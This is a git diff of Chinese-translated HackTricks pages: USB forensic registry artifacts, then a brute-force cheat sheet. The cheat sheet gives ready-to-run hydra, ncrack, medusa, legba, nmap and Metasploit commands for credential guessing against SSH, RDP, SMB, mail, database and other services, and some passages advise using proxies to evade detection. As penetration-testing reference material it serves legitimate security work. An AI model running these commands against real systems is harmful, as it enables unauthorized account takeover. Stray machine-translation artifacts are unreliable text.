* 制造商名称
* 产品名称和版本
* 设备类ID
* 卷名称(在以下图像中,卷名称是突出显示的子键)
* 设备类ID
* 卷名(在下面的图片中,卷名是突出显示的子键)
![](<../../../.gitbook/assets/image (477).png>)
@ -152,50 +155,52 @@ GUID是应用程序的ID。保存的数据
![](<../../../.gitbook/assets/image (478).png>)
有了上述信息,可以使用注册表`SOFTWARE\Microsoft\Windows Portable Devices\Devices`来获取**`{GUID}`**
有了前面的信息,注册表`SOFTWARE\Microsoft\Windows Portable Devices\Devices`可以用来获取**`{GUID}`**
![](<../../../.gitbook/assets/image (480).png>)
### 使用设备的用户
### 使用过该设备的用户
有了设备的**{GUID}**,现在可以**检查所有用户的NTUDER.DAT hive**搜索GUID直到在其中一个中找到它`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2`)。
有了设备的**{GUID}**,现在可以**检查所有用户的所有NTUDER.DAT配置单元**搜索GUID直到在其中一个中找到它`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2`)。
![](<../../../.gitbook/assets/image (481).png>)
### 最后挂载
通过检查注册表`System\MoutedDevices`,可以找出**最后挂载的设备**。在下图中使用Registry Explorer工具检查最后一个挂载在`E`上的设备是Toshiba
检查注册表`System\MoutedDevices`可以找出**最后挂载的设备是哪一个**。在下面的图片中,检查最后在`E:`挂载的设备是东芝的使用工具Registry Explorer
![](<../../../.gitbook/assets/image (483) (1) (1).png>)
### 卷序列号
在`Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`中,您可以找到卷序列号。**知道卷名和卷序列号,您可以将信息与使用该信息的LNK文件相关联**。
在`Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`中可以找到卷序列号。**知道卷名和卷序列号您可以将信息与使用该信息的LNK文件相关联**。
请注意,当格式化USB设备时
请注意当USB设备被格式化时:
* 创建新的卷名
* 创建新的卷序列号
* 保留物理序列号
* 创建一个新的卷名
* 创建一个新的卷序列号
* 物理序列号保持不变
### 时间戳
在`System\ControlSet001\Enum\USBSTOR{VEN_PROD_VERSION}{USB serial}\Properties{83da6326-97a6-4088-9453-a1923f573b29}\`中,您可以找到设备连接的首次和最后一次时间:
在`System\ControlSet001\Enum\USBSTOR{VEN_PROD_VERSION}{USB serial}\Properties{83da6326-97a6-4088-9453-a1923f573b29}\`中可以找到设备第一次和最后一次连接的时间:
* 0064 -- 次连接
* 0066 -- 最后连接
* 0064 -- 第一次连接
* 0066 -- 最后一次连接
* 0067 -- 断开连接
![](<../../../.gitbook/assets/image (482).png>)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习AWS黑客攻击直到成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
* 您在**网络安全公司**工作吗您想在HackTricks中看到您的**公司广告**吗或者您想获得最新版本的PEASS或下载PDF格式的HackTricks吗请查看[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks衣物**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧。**
支持HackTricks的其他方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>

395
generic-methodologies-and-resources/brute-force.md
View file

@ -1,6 +1,6 @@
# 暴力破解 - 备忘单
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建并**自动化工作流程**,由世界上**最先进的**社区工具提供支持。\
@ -10,19 +10,21 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习 AWS 黑客技术,成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS 红队专家)</strong></a><strong></strong></summary>
* 您在**网络安全公司**工作吗?您想在**HackTricks 中看到您的公司广告**吗?或者您想要访问**PEASS 的最新版本或下载 HackTricks 的 PDF**吗?查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的 [**NFTs**](https://opensea.io/collection/the-peass-family) 收藏
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在**推特**上**关注**我 [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向** [**hacktricks 仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud 仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交 PR 来分享您的黑客技巧。**
其他支持 HackTricks 的方式:
* 如果您希望在 HackTricks 中看到您的**公司广告**或**下载 HackTricks 的 PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)系列
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
</details>
## 默认凭证
在谷歌中**搜索**正在使用的技术的默认凭证,或**尝试以下链接**
在谷歌中**搜索**正在使用的技术的默认凭证,或**尝试以下链接**
* [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet)
* [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html)
@ -58,7 +60,7 @@ cewl example.com -m 5 -w words.txt
```
### [CUPP](https://github.com/Mebus/cupp)
根据对受害者的了解(姓名、日期等)生成密码
根据对受害者的了解(姓名、日期等)生成密码
```
python3 cupp.py -h
```
@ -98,10 +100,10 @@ Finished in 0.920s.
* [**https://hashkiller.io/listmanager**](https://hashkiller.io/listmanager)
* [**https://github.com/Karanxa/Bug-Bounty-Wordlists**](https://github.com/Karanxa/Bug-Bounty-Wordlists)
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 来轻松构建并**自动化工作流程**,由世界上**最先进**的社区工具提供支持。\
使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 来轻松构建并**自动化工作流程**这些工作流程由世界上**最先进**的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
@ -124,7 +126,7 @@ msf> run
```bash
nmap --script ajp-brute -p 8009 <IP>
```
## AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM 和 Solace)
## AMQPActiveMQ、RabbitMQ、Qpid、JORAM 和 Solace
```bash
legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]
```
@ -148,38 +150,17 @@ hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/word
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
```
### FTP
FTP文件传输协议是一种用于在网络上交换文件的标准网络协议。黑客可能会尝试使用暴力破解方法来获取FTP服务器的访问权限。这通常涉及尝试大量的用户名和密码组合直到找到有效的凭证。
#### 工具和资源
- **Hydra**: 这是一个快速的网络登录破解工具支持多种协议包括FTP。它可以进行并行字典攻击使破解过程更加高效。
- **John the Ripper**: 这个工具最初是用来破解Unix密码的但现在支持多种哈希类型和协议包括FTP。
- **Patator**: Patator是一个多用途的暴力破解工具支持多种服务和协议FTP也在其中。
#### 方法
1. 确定目标FTP服务器的IP地址和端口号。
2. 选择或创建一个用户名和密码的字典文件。
3. 使用上述工具之一,配置好必要的参数,开始暴力破解攻击。
4. 分析结果,如果成功获取凭证,确保合法和负责任地使用它们。
#### 注意事项
- 暴力破解可能会在目标系统上产生大量日志记录,可能会触发安全警报。
- 一些FTP服务器可能有防暴力破解的机制如账户锁定或延迟响应。
- 使用暴力破解技术可能违反法律,只应在授权的渗透测试或合法的安全评估中使用。
```bash
hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21
```
### HTTP通用暴力破解
### HTTP 通用暴力破解
#### [**WFuzz**](../pentesting-web/web-tool-wfuzz.md)
### HTTP基本认证
### HTTP 基本认证
```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
@ -199,7 +180,7 @@ hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordl
```markdown
对于 http**s**,您需要将 "http-post-form" 更改为 "**https-post-form"**
### **HTTP - CMS --** (W)ordpress、(J)oomla(D)rupal 或 (M)oodle
### **HTTP - CMS --** (W)ordpress、(J)oomla(D)rupal 或 (M)oodle
```
```bash
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
@ -207,33 +188,17 @@ cmsmap -f W/J/D/M -u a -p a https://wordpress.com
```
### IMAP
IMAPInternet Message Access Protocol是一种电子邮件获取协议它允许客户端从远程邮件服务器读取信息。攻击者可以利用IMAP进行暴力破解攻击尝试猜测用户的邮箱密码
IMAPInternet Message Access Protocol是一种电子邮件获取协议它允许客户端从远程邮件服务器读取信息。攻击者可以使用暴力破解方法尝试猜测用户的密码,获取对电子邮件账户的访问权限。这种方法通常涉及尝试大量的用户名和密码组合,直到找到正确的匹配项
#### Brute-force Attack
为了执行IMAP暴力破解攻击者可能会使用专门的工具如Hydra这是一款流行的网络密码破解工具。使用Hydra攻击者可以快速尝试多种组合以便找到正确的凭证。
暴力破解攻击中,攻击者使用预先准备的密码列表或生成密码的算法,通过不断尝试来猜测正确的密码。这种方法可能会耗费大量时间,并且如果目标系统有尝试次数限制或其他安全措施,攻击可能会失败。
进行IMAP暴力破解时应该注意以下几点
#### Tools
- **限制尝试次数**:许多邮件服务都有账户锁定机制,如果尝试次数过多,账户会被暂时锁定。
- **代理使用**为了避免被检测攻击者通常会通过代理服务器进行攻击这样可以隐藏真实的IP地址。
- **密码列表**:成功的暴力破解攻击往往依赖于高质量的密码列表。这些列表可以是从以前的数据泄露中获得,或者是根据目标用户可能使用的密码习惯定制的。
以下是一些可以用于IMAP暴力破解的工具
- **Hydra**: 这是一个非常流行的网络暴力破解工具支持多种协议包括IMAP。
- **CrackMapExec**: 这是一个后渗透工具也可以用于对IMAP服务进行暴力破解。
- **nmap**: 通过其脚本引擎Nmap Scripting Engine (NSE)nmap可以执行针对IMAP服务的暴力破解。
#### Mitigation
为了防止IMAP暴力破解攻击可以采取以下措施
- 启用账户锁定策略,当检测到多次失败尝试时锁定账户。
- 使用复杂且难以猜测的密码。
- 启用双因素认证2FA
- 监控异常登录尝试。
#### Resources
- [OWASP Testing Guide on Brute Force](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Weak_Password_Policy)
- [IMAP RFC 3501](https://tools.ietf.org/html/rfc3501)
使用IMAP暴力破解技术时应该遵守法律和道德规范只在授权的渗透测试或安全评估中使用。未经授权的访问可能会导致法律后果。
```bash
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
@ -241,8 +206,6 @@ nmap -sV --script imap-brute -p <PORT> <IP>
legba imap --username user --password data/passwords.txt --target localhost:993
```
### IRC
IRCInternet Relay Chat是一种在线聊天协议它允许用户通过不同的频道进行实时通信。黑客和安全研究人员经常使用IRC来交流技术信息、分享工具和协作。尽管它不像以前那么流行但IRC在某些社区中仍然是一个重要的资源。
```bash
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
```
@ -291,13 +254,7 @@ legba mongodb --target localhost:27017 --username root --password data/passwords
```
### MSSQL
MSSQLMicrosoft SQL Server是微软开发的一种关系数据库管理系统。它支持多种数据类型、复杂查询、数据分析和事务处理。MSSQL广泛应用于企业环境中用于存储和管理大量数据。
在渗透测试中攻击者可能会尝试使用暴力破解方法来获取对MSSQL数据库的访问权限。这通常涉及尝试大量的用户名和密码组合直到找到有效的凭据。成功的暴力破解攻击可以让攻击者访问敏感数据甚至可能获得对整个系统的控制。
为了进行暴力破解攻击,攻击者需要使用专门的工具和技术。这些工具可以自动化登录尝试过程,并能够快速尝试成千上万的不同组合。攻击者还可能利用从其他数据泄露中获得的凭据,因为用户往往会在不同的服务中重复使用相同的密码。
防御暴力破解攻击的方法包括实施账户锁定策略、使用复杂密码、启用多因素认证以及监控异常登录尝试。这些措施可以显著提高系统的安全性,减少被成功攻击的风险。
MSSQLMicrosoft SQL Server是微软开发的一种关系数据库管理系统。它支持多种数据类型、复杂查询、事务处理等功能。在渗透测试中攻击者可能会尝试使用暴力破解方法来获取对MSSQL数据库的访问权限。这通常涉及尝试大量的用户名和密码组合直到找到有效的凭证。
```bash
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
```
@ -339,7 +296,7 @@ nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt
```
为了使用 **patator****oracle\_login** 功能,你需要**安装**
为了使用 **patator****oracle\_login**,你需要**安装**
```bash
pip3 install cx_Oracle --upgrade
```
@ -349,27 +306,44 @@ nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid
```
### POP
POP(邮局协议)是一种用于从邮件服务器接收电子邮件的协议。黑客可以使用暴力破解攻击来尝试获取对电子邮件账户的访问权限。这通常涉及尝试大量的用户名和密码组合,直到找到正确的凭证为止。
POP, or Post Office Protocol, is an application-layer Internet standard protocol used by local email clients to retrieve email from a remote server over a TCP/IP connection. POP has been developed through several versions, with version 3 (POP3) being the last standard in widespread use.
#### 工具和资源
#### Brute Force Attack on POP
- **Hydra**: 这是一个快速的网络登录破解工具支持多种协议包括POP3。
- **John the Ripper**: 这个工具通常用于破解密码哈希但也可以用来对POP3账户进行暴力破解。
- **CrackMapExec**: 一个多功能工具可以用来对支持POP的邮件服务器进行暴力破解。
A brute force attack on POP involves attempting to log in to an email account by systematically guessing the password until the correct one is found. This method can be time-consuming and is often detected by security systems that monitor for multiple failed login attempts.
#### 方法
##### Tools for Brute Force Attacks on POP
1. 确定目标邮件服务器的IP地址和POP3端口通常是110或995
2. 使用上述工具之一,配置攻击参数,包括用户名列表、密码列表和连接设置。
3. 启动攻击并监控进度,直到找到有效的凭证。
4. 一旦获取了访问权限,就可以读取目标的电子邮件。
- **Hydra**: A very fast network logon cracker which supports many different services.
- **John the Ripper**: A fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS.
- **CrackMapExec**: A swiss army knife for pentesting networks.
#### 防御措施
##### Mitigation Strategies
- 启用账户锁定策略,以防止在多次登录失败后继续尝试。
- 使用强密码,并定期更换密码。
- 启用多因素认证,为账户安全增加一层额外保护。
- 监控不寻常的登录尝试,并及时响应可疑活动。
- Implement account lockout policies after a certain number of failed login attempts.
- Use strong, complex passwords that are difficult to guess.
- Enable two-factor authentication (2FA) to add an extra layer of security.
- Monitor login attempts and set up alerts for suspicious activities.
#### POP3 over SSL/TLS
POP3 can also be secured using SSL/TLS, which is referred to as POP3S. This adds a layer of encryption to the data transmitted between the email client and the server, making it more difficult for attackers to intercept and read the information.
##### Brute Force Attack on POP3S
A brute force attack on POP3S is similar to one on POP, but the encrypted connection requires additional steps to intercept and analyze the traffic, making the attack more complex.
##### Tools for Brute Force Attacks on POP3S
- **Hydra**: Supports POP3S with the appropriate SSL flags.
- **John the Ripper**: Can be used if the hash of the password is obtained through other means.
- **CrackMapExec**: Useful for network reconnaissance and can be adapted for POP3S with the right modules.
##### Mitigation Strategies
- Use all the mitigation strategies listed for POP, as they apply to POP3S as well.
- Ensure SSL/TLS settings are properly configured and up to date.
- Regularly update and patch email server software to fix vulnerabilities.
```bash
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
@ -381,20 +355,6 @@ legba pop3 --username admin@example.com --password wordlists/passwords.txt --tar
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl
```
### PostgreSQL
PostgreSQL是一种广泛使用的开源关系数据库管理系统RDBMS。在渗透测试中攻击者可能会尝试使用暴力破解方法来获取对数据库的访问权限。以下是一些用于暴力破解PostgreSQL数据库的工具和资源
- **Hydra**: 这是一个快速的网络登录破解工具支持多种协议包括PostgreSQL。它可以进行并发连接加快破解速度。
- **Ncrack**: 这个工具由Nmap的开发者创建旨在帮助公司进行网络安全审计。它支持多种协议也包括PostgreSQL。
- **Medusa**: 类似于HydraMedusa是一个速度极快的并行网络登录破解工具支持多种服务。
在尝试暴力破解时,应该注意以下几点:
- **账号锁定**: 一些系统在多次登录失败后会锁定账号。这可能会导致服务中断,应谨慎处理。
- **密码策略**: 强密码策略会使暴力破解变得更加困难。了解目标系统的密码策略可以帮助定制破解策略。
- **网络限制**: 目标系统可能有防火墙或其他网络限制措施来阻止暴力破解攻击。了解这些限制并找到方法绕过它们是关键。
使用这些工具时,应始终遵守法律和道德规范。未经授权的访问可能会导致法律后果。
```bash
hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> U /root/Desktop/user.txt P /root/Desktop/pass.txt M postgres
@ -412,27 +372,6 @@ sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter u <Username> <IP>
```
### RDP
Remote Desktop Protocol (RDP) 是一种由 Microsoft 开发的协议,允许用户通过网络连接到另一台计算机。攻击者经常尝试使用暴力破解方法来猜测密码,以便未经授权地访问目标系统。
#### 工具和资源
- **Hydra** - 这是一个快速的网络登录破解工具,支持多种协议,包括 RDP。
- **Ncrack** - 这个工具是专门为网络服务设计的,它可以帮助进行快速的密码破解尝试。
- **Crowbar** - 它是一个针对不同服务的暴力破解工具,也支持 RDP。
#### 方法
1. 确定目标系统的 IP 地址和 RDP 服务端口(默认为 3389
2. 选择一个工具并配置必要的参数,如目标 IP、端口和用户名列表。
3. 使用密码字典或生成密码组合来尝试登录。
4. 监控进程并记录成功的登录尝试。
#### 注意事项
- 确保在进行暴力破解时遵守法律和道德规范。
- 暴力破解可能会在目标系统上产生大量日志记录,可能触发安全警报。
- 使用代理或 VPN 来避免直接暴露攻击者的 IP 地址。
```bash
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
@ -447,38 +386,28 @@ legba redis --target localhost:6379 --username admin --password data/passwords.t
```
### Rexec
(此部分保持原样,不需要翻译)
(Translation not required for the title as per instructions)
Rexec是一种在远程主机上执行命令的服务。它通常在默认安装中不启用但如果启用可能会受到暴力破解攻击。要使用rexec攻击者需要知道有效的用户名和密码。
#### 如何保护
- 禁用rexec服务。
- 使用强密码,并定期更换。
- 限制可以访问rexec服务的IP地址。
- 使用防火墙和入侵检测系统来监控rexec尝试。
```bash
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
```
### Rlogin
Rlogin (remote login) 是一种允许用户在另一台计算机上登录的 UNIX 命令。这个过程通常不使用加密,因此可能会受到中间人攻击。攻击者可以尝试使用暴力破解来获取访问权限。
Rlogin (remote login) 是一种允许用户通过网络登录到另一台计算机的协议。它是早期互联网协议套件的一部分现在已经被更安全的协议如SSH所取代。尽管如此一些旧系统可能仍然在使用Rlogin这可能会成为攻击者的目标
### Brute Force Attack
在尝试对Rlogin服务进行暴力破解时攻击者通常会利用用户名和密码列表来尝试登录。由于Rlogin协议的安全性较低不需要复杂的技术即可进行此类攻击。然而现代系统中的防御措施如账户锁定和登录尝试限制可以减少暴力破解的成功率。
暴力破解攻击是一种试图猜测所有可能的密码组合以获得未授权访问的方法。这种方法可能会耗费大量时间,取决于密码的复杂性和攻击者使用的工具
攻击者可能会使用工具如`Hydra`来自动化暴力破解过程。此外,如果攻击者能够获得到目标系统的有效用户名列表,那么暴力破解的可能性会大大增加。用户名列表可以通过社交工程、公开的数据泄露或其他信息收集技术获得
#### Tools
以下是一些用于暴力破解的工具:
- **Hydra**: 这是一个快速的网络登录破解工具,支持多种协议。
- **John the Ripper**: 这是一个流行的密码破解工具,可以处理多种密码哈希类型。
- **CrackMapExec**: 这是一个后渗透工具,也可以用于暴力破解。
#### Resources
- **SecLists**: 这是一个安全测试者使用的密码列表、用户名列表和其他类型数据的集合。
- **Hashcat**: 这是世界上最快的密码恢复工具之一。
### Password Spraying
密码喷射是一种暴力破解的变体,它使用一个密码尝试访问多个账户,而不是对一个账户尝试多个密码。这种方法可以避免账户因尝试次数过多而被锁定。
### Credential Stuffing
凭证填充是一种自动化攻击,攻击者使用从其他泄露中获取的用户名和密码组合尝试登录到不同的网站。由于许多用户会重复使用密码,这种方法可能会有一定的成功率。
在进行暴力破解攻击时,应该注意遵守法律和道德规范。未经授权的访问计算机系统是非法的,并且可能会导致严重的法律后果。
```bash
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
```
@ -492,7 +421,9 @@ hydra -L <Username_list> rsh://<Victim_IP> -v -V
```bash
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
```
### RTSP (实时流传输协议)
### RTSP
RTSP实时流传输协议是用于控制音频或视频流的网络控制协议。攻击者可以尝试使用暴力破解方法来获取未授权的访问权限。
```bash
hydra -l root -P passwords.txt <IP> rtsp
```
@ -504,28 +435,22 @@ legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --tar
```
### SNMP
SNMP简单网络管理协议是用于管理网络上设备的一种协议。通过使用不同版本的SNMP攻击者可以尝试利用默认的或弱的社区字符串来获取敏感信息。
SNMP简单网络管理协议是用于管理网络上设备的一种协议。通过使用不同版本的SNMP攻击者可以尝试利用默认的或弱的社区字符串来获取网络设备的敏感信息。社区字符串类似于密码,用于控制对设备的访问权限。
#### 工具
#### Brute Forcing SNMP Community Strings
以下是一些用于SNMP爆破的工具
当尝试破解SNMP社区字符串时攻击者通常会使用字典攻击或暴力破解方法。这些方法可以通过工具如`Hydra`或`Ncrack`来实现。成功破解社区字符串后,攻击者可以访问网络设备的配置和性能数据。
- **onesixtyone** - 快速扫描大型网络以寻找开放的SNMP服务。
- **snmpcheck** - 无需社区字符串即可提取SNMP信息。
- **snmpwalk** - 用于遍历SNMP节点的工具。
- **snmpbrute** - 用于对SNMP服务进行爆破的工具。
#### Tools and Resources
#### 方法
- `onesixtyone` - 用于快速扫描大量IP地址以寻找开放的SNMP服务。
- `snmpwalk` - 用于在设备上执行SNMP查询的工具。
- `snmp-check` - 用于枚举SNMP设备信息的工具。
- `Nmap` - 可以使用Nmap的脚本引擎NSE来发现和利用SNMP服务。
1. **识别目标** - 使用工具如Nmap确定目标网络中的SNMP服务。
2. **枚举** - 使用onesixtyone或snmpwalk等工具枚举信息。
3. **爆破** - 如果需要使用snmpbrute等工具尝试破解社区字符串。
4. **分析** - 分析获取的信息,寻找敏感数据泄露或配置问题。
#### Countermeasures
#### 资源
- [SNMP Enumeration Guide](https://book.hacktricks.xyz/pentesting/161-pentesting-snmp)
- [snmpwalk Documentation](http://www.net-snmp.org/docs/man/snmpwalk.html)
为了防止SNMP攻击建议使用SNMPv3因为它提供了更好的安全性包括认证和加密。此外应该更改默认的社区字符串并且定期监控SNMP流量以检测异常行为。
```bash
msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
@ -533,6 +458,28 @@ onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
```
### SMB
SMB (Server Message Block) 是一种网络文件共享协议允许计算机之间共享访问文件和打印机。攻击者可以尝试使用暴力破解方法来获取对SMB服务的访问权限。这通常涉及尝试大量的用户名和密码组合直到找到有效的凭据。
#### 工具和资源
- **Hydra** - 一个强大的登录破解工具支持多种协议包括SMB。
- **CrackMapExec** - 一个后渗透工具也可以用于SMB服务的凭证暴力破解。
- **Metasploit** - 一个安全框架提供了多个用于SMB认证绕过和凭证破解的模块。
#### 方法
1. 确定目标SMB服务的IP地址和端口号通常是445
2. 收集可能的用户名列表,可以通过社交工程、公开信息收集或数据泄露获取。
3. 准备密码列表,或使用常见密码字典。
4. 使用上述工具之一进行暴力破解尝试。
5. 分析结果,如果成功获取凭据,进一步探索网络。
#### 注意事项
- 暴力破解可能会在目标系统上产生大量日志记录,可能触发安全警报。
- 为减少被检测的风险,应考虑节流尝试速度或使用代理。
- 确保在授权的情况下进行测试,未经授权的访问可能违反法律。
```bash
nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
@ -551,7 +498,7 @@ legba socks5 --target localhost:1080 --username admin --password data/passwords.
# With alternative address
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080
```
### SQL Server
### SQL 服务器
```bash
#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
@ -562,28 +509,25 @@ msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts
```
### SSH
SSH (Secure Shell) 是一种网络协议,用于加密方式远程登录和操作计算机系统。SSH 提供了一种安全的方法,通过不安全的网络环境中,对服务器进行访问和管理
SSH (Secure Shell) 是一种网络协议,用于加密方式远程登录和其他网络服务。攻击者常使用暴力破解方法尝试猜测SSH服务的用户名和密码
#### Brute Force Attack
#### 常见的SSH暴力破解工具
在 SSH 中,暴力破解攻击是一种常见的攻击手段,攻击者尝试猜测或穷举用户名和密码,以获得对目标系统的访问权限。这种方法通常涉及自动化工具,可以快速尝试成千上万的用户名和密码组合。
- **Hydra** - 这是一个快速的网络登录破解工具支持多种协议包括SSH。
- **Medusa** - 类似于Hydra但它设计用于快速测试大量主机。
- **Ncrack** - 来自Nmap开发者的工具旨在帮助公司进行大规模的网络暴力破解。
#### 防御措施
- **使用强密码**:确保所有用户账户都有强大、复杂的密码。
- **限制尝试次数**:通过配置 SSH 服务来限制登录尝试次数,可以减缓攻击速度。
- **使用密钥认证**:使用基于密钥的认证而不是密码认证,可以大大提高安全性。
- **更改默认端口**:将 SSH 服务从默认的端口 22 更改到其他端口,可以减少自动化攻击。
